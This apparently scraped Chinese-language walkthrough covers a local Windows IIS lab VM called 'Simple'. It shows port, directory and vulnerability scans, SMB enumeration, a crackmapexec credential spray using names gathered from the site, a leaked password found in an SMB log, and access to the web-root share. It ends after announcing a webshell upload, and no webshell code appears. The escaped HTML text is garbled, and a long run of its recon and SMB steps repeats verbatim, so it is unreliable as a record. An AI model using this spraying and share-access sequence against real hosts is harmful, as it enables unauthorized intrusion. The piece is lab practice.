![\"image-20240408121116109\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007891.png\")
<\/div>\n
![\"image-20240408121227696\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007893.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sCV -p 1-65535 172.20.10.4<\/code><\/pre>\nPORT STATE SERVICE VERSION\n80\/tcp open http Microsoft IIS httpd 10.0\n| http-methods: \n|_ Potentially risky methods: TRACE\n|_http-title: Simple\n|_http-server-header: Microsoft-IIS\/10.0\n135\/tcp open msrpc Microsoft Windows RPC\n139\/tcp open netbios-ssn Microsoft Windows netbios-ssn\n445\/tcp open microsoft-ds?\n5985\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n47001\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49664\/tcp open msrpc Microsoft Windows RPC\n49665\/tcp open msrpc Microsoft Windows RPC\n49666\/tcp open msrpc Microsoft Windows RPC\n49667\/tcp open msrpc Microsoft Windows RPC\n49668\/tcp open msrpc Microsoft Windows RPC\n49669\/tcp open msrpc Microsoft Windows RPC\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-time: \n| date: 2024-04-08T04:20:40\n|_ start_date: N\/A\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled but not required\n|_clock-skew: 2s\n|_nbstat: NetBIOS name: SIMPLE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b7:b6:07 (Oracle VirtualBox virtual NIC) <\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nferoxbuster -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302<\/code><\/pre>\n301 GET 2l 10w 160c http:\/\/172.20.10.4\/images => http:\/\/172.20.10.4\/images\/\n200 GET 60l 128w 1369c http:\/\/172.20.10.4\/03-comming-soon\/css\/responsive.css\n200 GET 134l 438w 3905c http:\/\/172.20.10.4\/03-comming-soon\/css\/styles.css\n200 GET 50l 96w 1481c http:\/\/172.20.10.4\/\n301 GET 2l 10w 160c http:\/\/172.20.10.4\/Images => http:\/\/172.20.10.4\/Images\/\n301 GET 2l 10w 159c http:\/\/172.20.10.4\/fonts => http:\/\/172.20.10.4\/fonts\/\n301 GET 2l 10w 160c http:\/\/172.20.10.4\/IMAGES => http:\/\/172.20.10.4\/IMAGES\/\n301 GET 2l 10w 159c http:\/\/172.20.10.4\/Fonts => http:\/\/172.20.10.4\/Fonts\/<\/code><\/pre>\n\u626b\u63cf\u65f6\u95f4\u8fc7\u957f\uff0c\u4e0d\u7528\u7b49\uff0c\u5bf9\u6d4b\u8bd5\u6ca1\u5565\u5927\u7528\u5904\u3002<\/p>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-08 00:22:12 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Microsoft-IIS\/10.0\n+ \/: Retrieved x-powered-by header: ASP.NET.\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/LaQsQxLy.asmx: Retrieved x-aspnet-version header: 4.0.30319.\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host\n+ End Time: 2024-04-08 00:23:11 (GMT-4) (59 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240408121938073\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u968f\u624b\u67e5\u770b\u4e00\u4e0b\u6f0f\u6d1e\uff0c\u6ca1\u5565\u53d1\u73b0\uff0c\u7ee7\u7eed\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u4e5f\u6ca1\u5565\u53d1\u73b0\uff1a<\/p>\n
\u63d0\u5230\u4e86\u51e0\u4e2a\u540d\u5b57\u5c1d\u8bd5\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\n
# user.txt\necho "ruy\\nmarcos\\nlander\\nbogo\\nvaiper" > user.txt<\/code><\/pre>\n\u654f\u611f\u7aef\u53e3<\/h3>\nSMB\u670d\u52a1<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ enum4linux 172.20.10.4 \nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Mon Apr 8 00:31:02 2024\n =========================================( Target Information )=========================================\nTarget ........... 172.20.10.4\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n ============================( Enumerating Workgroup\/Domain on 172.20.10.4 )============================\n[+] Got domain\/workgroup name: WORKGROUP\n ================================( Nbtstat Information for 172.20.10.4 )================================\nLooking up status of 172.20.10.4\n SIMPLE <20> - B <ACTIVE> File Server Service\n SIMPLE <00> - B <ACTIVE> Workstation Service\n WORKGROUP <00> - <GROUP> B <ACTIVE> Domain\/Workgroup Name\n\n MAC Address = 08-00-27-B7-B6-07\n ====================================( Session Check on 172.20.10.4 )====================================\n[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ smbmap -H 172.20.10.4 \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 0 SMB session(s) \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ smbclient \/\/172.20.10.4\/share \nPassword for [WORKGROUP\\kali]:\nsession setup failed: NT_STATUS_ACCESS_DENIED<\/code><\/pre>\n\u53ef\u60dc\u6ca1\u5565\u6536\u83b7\u3002\u3002\u3002\u7206\u7834\u4e00\u4e0b\uff1f\u60f3\u8d77\u6765\u4e86\u7eff\u5e08\u5085\u7684\u90a3\u4e2a\u5de5\u5177\uff0c\u6628\u5929\u505azurrak\u7528\u5230\u7684\uff1a<\/p>\n
crackmapexec smb 172.20.10.4 -u user.txt -p user.txt<\/code><\/pre>\n<\/div><\/p>\n\u4f3c\u4e4e\u9614\u4ee5\u8bd5\u8bd5\uff1f<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ smbclient \/\/172.20.10.4\/share -U bogo\nPassword for [WORKGROUP\\bogo]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n\u6362\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n\u4e0d\u884c\u54ea\u91cc\u5f04\u9519\u4e86\uff0c\u8fd8\u5f97\u91cd\u65b0\u63a2\u67e5\u4e00\u4e0b\uff0c\u7f51\u4e0a\u641c\u8fd9\u79cd\u62a5\u9519\u4e5f\u5f88\u5c11\uff0c\u6211\u91cd\u542f\u4e00\u4e0b\u9776\u673a\u8bd5\u8bd5\uff0c\u8fd8\u662f\u4f1a\u5b58\u5728\u4e00\u6837\u7684\u62a5\u9519\uff0c\u7136\u540e\u4e0a\u7f51\u627e\u5230\u4e86\u8fd9\u4e2a<\/p>\n
<\/div><\/p>\n\u627eai\u95ee\u4e00\u4e0b\uff0c\u53d1\u73b0\uff1a<\/p>\n
<\/div><\/p>\n\uff1f\uff1f\uff1f\uff1f\uff1fwtf\uff01<\/p>\n
\u6211\u8fd9\u91cc\u76f4\u63a5\u8df3\u4e86\uff1a<\/p>\n
smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\n\n Sharename Type Comment\n --------- ---- -------\n ADMIN$ Disk Admin remota\n C$ Disk Recurso predeterminado\n IPC$ IPC IPC remota\n LOGS Disk \n WEB Disk <\/code><\/pre>\n\u7136\u540e\u5f97\u5230LOGS<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4e0b\u4e00\u6b65\uff1a<\/p>\nsmbclient \/\/172.20.10.4\/LOGS\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n\n 20231008.log \n\nsmb: \\> get 20231008.log <\/code><\/pre>\ncat 20231008.log\nPS C:\\> dir \\\\127.0.0.1\\WEB\nAcceso denegado\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : PermissionDenied: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], UnauthorizedAccessException\n + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\nCannot find path '\\\\127.0.0.1\\WEB' because it does not exist.\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : ObjectNotFound: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], ItemNotFoundException\n + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n\nPS C:\\> net use \\\\127.0.0.1\\WEB\nSe ha completado el comando correctamente.\n\nPS C:\\> dir \\\\127.0.0.1\\WEB\nAcceso denegado\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : PermissionDenied: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], UnauthorizedAccessException\n + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\nCannot find path '\\\\127.0.0.1\\WEB' because it does not exist.\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : ObjectNotFound: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], ItemNotFoundException\n + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n\nPS C:\\> net use \\\\127.0.0.1\\WEB \/user:marcos SuperPassword\nSe ha completado el comando correctamente.\n\nPS C:\\> dir \\\\127.0.0.1\\WEB\n\n Directorio: \\\\127.0.0.1\\WEB\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\nd----- 10\/8\/2023 9:46 PM aspnet_client\n-a---- 9\/26\/2023 6:46 PM 703 iisstart.htm\n-a---- 10\/8\/2023 10:46 PM 158 test.php\n\nPS C:\\> rm \\\\127.0.0.1\\WEB\\*.php\n\nPS C:\\> dir \\\\127.0.0.1\\WEB\n\n Directorio: \\\\127.0.0.1\\WEB\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\nd----- 10\/8\/2023 9:46 PM aspnet_client\n-a---- 9\/26\/2023 6:46 PM 703 iisstart.htm\n\nPS C:\\> <\/code><\/pre>\n\u8bf4\u660e\u627e\u5230\u4e86WEB<\/code>\u76ee\u5f55\uff0c\u4ee5\u53ca\u8d26\u53f7\u5bc6\u7801\uff1auser:marcos SuperPassword<\/code><\/p>\n\u5230\u8fd9\u91cc\u4e3a\u6b62\uff0c\u6211\u90fd\u505a\u4e0d\u4e86\uff0c\u4e0b\u9762\u6211\u63a5\u7740\u5728\u672c\u673a\u4e0a\u8fdb\u884c\u64cd\u4f5c\u4e00\u4e0b\u54c8\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient \/\/172.20.10.4\/WEB\/ -U marcos\nPassword for [WORKGROUP\\marcos]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n\u5f53\u6211\u6ca1\u8bf4\u3002\u3002\u3002\u3002\u9000\u4e00\u6b65\u8d8a\u60f3\u8d8a\u6c14\uff0c\u5c1d\u8bd5\u80fd\u4e0d\u80fd\u8fdb\u5165\u7cfb\u7edf\u4fee\u6539\u4e00\u4e0b\uff1a<\/p>\n
\u89e3\u51b3bug<\/h3>\n
\u70b9\u51fb\u53f3\u8fb9\u7684\u90a3\u4e2actrl+del<\/code>:<\/p>\n<\/div><\/p>\n\u6309esc<\/code>\u8fdb\u5165\u7528\u6237\u5217\u8868\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u7136\u540e\u5bc4\u4e86\uff0c\u8fd9\u4ee8\u5bc6\u7801\u6211\u4eec\u4e00\u4e2a\u90fd\u4e0d\u77e5\u9053\u3002\u3002\u3002\u6211\u9009\u4e86bogo\u7136\u540e\u7167\u7740\u9875\u9762\uff0c\u6309\u4e86\u5565esc<\/code>\u5565\u7684\uff0c\u7136\u540e\u8f93\u5165\u7684\u5730\u65b9\u5168\u9009\u4e86bogo<\/code>\uff0c\u7136\u540e\u83ab\u540d\u5947\u5999\u8fdb\u6765\u4e86\u3002\u3002<\/p>\n<\/div><\/p>\n\u4e0d\u8981\u614c\uff0c\u4e0b\u9762\u8fd8\u8981\u6539\u4e00\u4e2a\uff0c\u6211\u4e0b\u9762\u518d\u622a\u56fe\uff1a<\/p>\n
\u518d\u626b\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\n\n Sharename Type Comment\n --------- ---- -------\n ADMIN$ Disk Admin remota\n C$ Disk Recurso predeterminado\n IPC$ IPC IPC remota\n LOGS Disk \n WEB Disk \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 172.20.10.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available<\/code><\/pre>\n<\/div><\/p>\n\u6211\u524d\u9762\u53ef\u6ca1\u6284\u55f7\uff01\u8bfb\u4e66\u4eba\u7684\u4e8b\u600e\u4e48\u80fd\u53eb\u6284\u5462\u3002<\/p>\n
\u6211\u771ftm\u725b\u903c\uff0c\u518d\u6539\u4e00\u4e0b\u53e6\u4e00\u4e2a\uff0c\u8fd9\u6b21\u6211\u4e00\u6b65\u4e00\u622a\u56fe\uff1a<\/p>\n
<\/div><\/p>\n\u7b2c\u4e00\u6b65<\/h4>\n
\u5148\u6309\u7a7a\u683c\u53f3\u8fb9\u7684ctrl+del<\/code><\/p>\n<\/div><\/p>\n\u7b2c\u4e8c\u6b65<\/h4>\n
\u6309esc<\/code>\u4e24\u6b21\uff0c\u754c\u9762\u53d8\u4e86\u5c31\u4e0d\u7528\u6309\u4e86\uff0c\u4e00\u76f4\u6ca1\u53d8\u7684\u8bdd\u70b9\u51fb\u4e00\u4e0b\u90a3\u4e2a\u5c4f\u5e55\u518d\u6309<\/p>\n<\/div><\/p>\n\u518d\u6309esc<\/code>:<\/p>\n<\/div><\/p>\n\u7b2c\u4e09\u6b65<\/h4>\n
\u6211\u4eec\u8981\u6539\u7b2c\u4e09\u4e2a\u5c1d\u8bd5\u4f7f\u7528tab<\/code>\u5230\u90a3\u91cc\uff0c\u7136\u540e\u5148esc<\/code>\u518denter<\/code><\/p>\n<\/div><\/p>\n\u8f93\u5165\u5bc6\u7801\uff1aSuperPassword<\/code>\uff0c\u7136\u540e\u5148esc<\/code>\u518denter<\/code>\uff01<\/p>\n<\/div><\/p>\n\u8001\u6837\u5b50esc<\/code> +enter<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u5168\u90e8\u8f93\u5165SuperPassword<\/code>\uff0c\u8f93\u5165\u5b8c\u4e00\u884ctab<\/code>\u4e00\u4e0b\uff0c\u6700\u540eenter<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u989d\uff0c\u96be\u9053\u5199\u9519\u4e86\uff1f\u518desc + enter<\/code>\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u8fd9\u4e0b\u5bf9\u80c3\u4e86\uff01esc+enter<\/code>\u5c1d\u8bd5\u4e00\u4e0b\u80fd\u5426\u770b\u5230\uff1a<\/p>\n<\/div><\/p>\nok\u4e86\uff01\u9614\u4ee5\u7ee7\u7eed\u505a\u4e86\uff01<\/p>\n
\u7ee7\u7eedSMB<\/h3>\n
\u6839\u636e\u63d0\u53d6\u5230\u7684\u4fe1\u606f\u8fdb\u884c\u64cd\u4f5c\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient -L \/\/172.20.10.4\/WEB -U marcos\nPassword for [WORKGROUP\\marcos]:\n\n Sharename Type Comment\n --------- ---- -------\n ADMIN$ Disk Admin remota\n C$ Disk Recurso predeterminado\n IPC$ IPC IPC remota\n LOGS Disk \n WEB Disk \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 172.20.10.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient \/\/172.20.10.4\/WEB -U marcos \nPassword for [WORKGROUP\\marcos]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Sun Oct 8 11:14:24 2023\n .. D 0 Sun Oct 8 11:14:24 2023\n 03-comming-soon D 0 Sun Oct 8 17:22:15 2023\n aspnet_client D 0 Sun Oct 8 15:46:18 2023\n common-js D 0 Sun Oct 8 17:14:09 2023\n fonts D 0 Sun Oct 8 17:14:09 2023\n images D 0 Sun Oct 8 17:14:09 2023\n index.html A 1481 Sun Oct 8 17:26:47 2023\n\n 12966143 blocks of size 4096. 11127775 blocks available\nsmb: \\><\/code><\/pre>\n\u53ef\u4ee5\u770b\u5230\u662f\u6211\u4eec\u7684web\u76ee\u5f55\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20webshell\u8fdb\u884c\u8bbf\u95ee\uff0c\u56e0\u4e3a\u662fIIS\u670d\u52a1\u5668\uff0c\u5c1d\u8bd5\u4e0a\u4f20ASPX\u6216\u8005ASP\u7684webshell\uff01\u9614\u4ee5\u4f7f\u7528kali\u81ea\u5e26\u7684\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528msf\u751f\u6210\u4e00\u4e2a\uff01<\/p>\n
nmap -sCV -p 1-65535 172.20.10.4<\/code><\/pre>\nPORT STATE SERVICE VERSION\n80\/tcp open http Microsoft IIS httpd 10.0\n| http-methods: \n|_ Potentially risky methods: TRACE\n|_http-title: Simple\n|_http-server-header: Microsoft-IIS\/10.0\n135\/tcp open msrpc Microsoft Windows RPC\n139\/tcp open netbios-ssn Microsoft Windows netbios-ssn\n445\/tcp open microsoft-ds?\n5985\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n47001\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49664\/tcp open msrpc Microsoft Windows RPC\n49665\/tcp open msrpc Microsoft Windows RPC\n49666\/tcp open msrpc Microsoft Windows RPC\n49667\/tcp open msrpc Microsoft Windows RPC\n49668\/tcp open msrpc Microsoft Windows RPC\n49669\/tcp open msrpc Microsoft Windows RPC\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-time: \n| date: 2024-04-08T04:20:40\n|_ start_date: N\/A\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled but not required\n|_clock-skew: 2s\n|_nbstat: NetBIOS name: SIMPLE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b7:b6:07 (Oracle VirtualBox virtual NIC) <\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nferoxbuster -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302<\/code><\/pre>\n301 GET 2l 10w 160c http:\/\/172.20.10.4\/images => http:\/\/172.20.10.4\/images\/\n200 GET 60l 128w 1369c http:\/\/172.20.10.4\/03-comming-soon\/css\/responsive.css\n200 GET 134l 438w 3905c http:\/\/172.20.10.4\/03-comming-soon\/css\/styles.css\n200 GET 50l 96w 1481c http:\/\/172.20.10.4\/\n301 GET 2l 10w 160c http:\/\/172.20.10.4\/Images => http:\/\/172.20.10.4\/Images\/\n301 GET 2l 10w 159c http:\/\/172.20.10.4\/fonts => http:\/\/172.20.10.4\/fonts\/\n301 GET 2l 10w 160c http:\/\/172.20.10.4\/IMAGES => http:\/\/172.20.10.4\/IMAGES\/\n301 GET 2l 10w 159c http:\/\/172.20.10.4\/Fonts => http:\/\/172.20.10.4\/Fonts\/<\/code><\/pre>\n\u626b\u63cf\u65f6\u95f4\u8fc7\u957f\uff0c\u4e0d\u7528\u7b49\uff0c\u5bf9\u6d4b\u8bd5\u6ca1\u5565\u5927\u7528\u5904\u3002<\/p>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-08 00:22:12 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Microsoft-IIS\/10.0\n+ \/: Retrieved x-powered-by header: ASP.NET.\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/LaQsQxLy.asmx: Retrieved x-aspnet-version header: 4.0.30319.\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host\n+ End Time: 2024-04-08 00:23:11 (GMT-4) (59 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div>
\n<\/div><\/p>\n\u968f\u624b\u67e5\u770b\u4e00\u4e0b\u6f0f\u6d1e\uff0c\u6ca1\u5565\u53d1\u73b0\uff0c\u7ee7\u7eed\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u4e5f\u6ca1\u5565\u53d1\u73b0\uff1a<\/p>\n
\u63d0\u5230\u4e86\u51e0\u4e2a\u540d\u5b57\u5c1d\u8bd5\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\n
# user.txt\necho "ruy\\nmarcos\\nlander\\nbogo\\nvaiper" > user.txt<\/code><\/pre>\n\u654f\u611f\u7aef\u53e3<\/h3>\nSMB\u670d\u52a1<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ enum4linux 172.20.10.4 \nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Mon Apr 8 00:31:02 2024\n =========================================( Target Information )=========================================\nTarget ........... 172.20.10.4\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n ============================( Enumerating Workgroup\/Domain on 172.20.10.4 )============================\n[+] Got domain\/workgroup name: WORKGROUP\n ================================( Nbtstat Information for 172.20.10.4 )================================\nLooking up status of 172.20.10.4\n SIMPLE <20> - B <ACTIVE> File Server Service\n SIMPLE <00> - B <ACTIVE> Workstation Service\n WORKGROUP <00> - <GROUP> B <ACTIVE> Domain\/Workgroup Name\n\n MAC Address = 08-00-27-B7-B6-07\n ====================================( Session Check on 172.20.10.4 )====================================\n[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ smbmap -H 172.20.10.4 \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 0 SMB session(s) \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ smbclient \/\/172.20.10.4\/share \nPassword for [WORKGROUP\\kali]:\nsession setup failed: NT_STATUS_ACCESS_DENIED<\/code><\/pre>\n\u53ef\u60dc\u6ca1\u5565\u6536\u83b7\u3002\u3002\u3002\u7206\u7834\u4e00\u4e0b\uff1f\u60f3\u8d77\u6765\u4e86\u7eff\u5e08\u5085\u7684\u90a3\u4e2a\u5de5\u5177\uff0c\u6628\u5929\u505azurrak\u7528\u5230\u7684\uff1a<\/p>\n
crackmapexec smb 172.20.10.4 -u user.txt -p user.txt<\/code><\/pre>\n<\/div><\/p>\n\u4f3c\u4e4e\u9614\u4ee5\u8bd5\u8bd5\uff1f<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ smbclient \/\/172.20.10.4\/share -U bogo\nPassword for [WORKGROUP\\bogo]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n\u6362\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Simple]\n\u2514\u2500$ smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n\u4e0d\u884c\u54ea\u91cc\u5f04\u9519\u4e86\uff0c\u8fd8\u5f97\u91cd\u65b0\u63a2\u67e5\u4e00\u4e0b\uff0c\u7f51\u4e0a\u641c\u8fd9\u79cd\u62a5\u9519\u4e5f\u5f88\u5c11\uff0c\u6211\u91cd\u542f\u4e00\u4e0b\u9776\u673a\u8bd5\u8bd5\uff0c\u8fd8\u662f\u4f1a\u5b58\u5728\u4e00\u6837\u7684\u62a5\u9519\uff0c\u7136\u540e\u4e0a\u7f51\u627e\u5230\u4e86\u8fd9\u4e2a<\/p>\n
<\/div><\/p>\n\u627eai\u95ee\u4e00\u4e0b\uff0c\u53d1\u73b0\uff1a<\/p>\n
<\/div><\/p>\n\uff1f\uff1f\uff1f\uff1f\uff1fwtf\uff01<\/p>\n
\u6211\u8fd9\u91cc\u76f4\u63a5\u8df3\u4e86\uff1a<\/p>\n
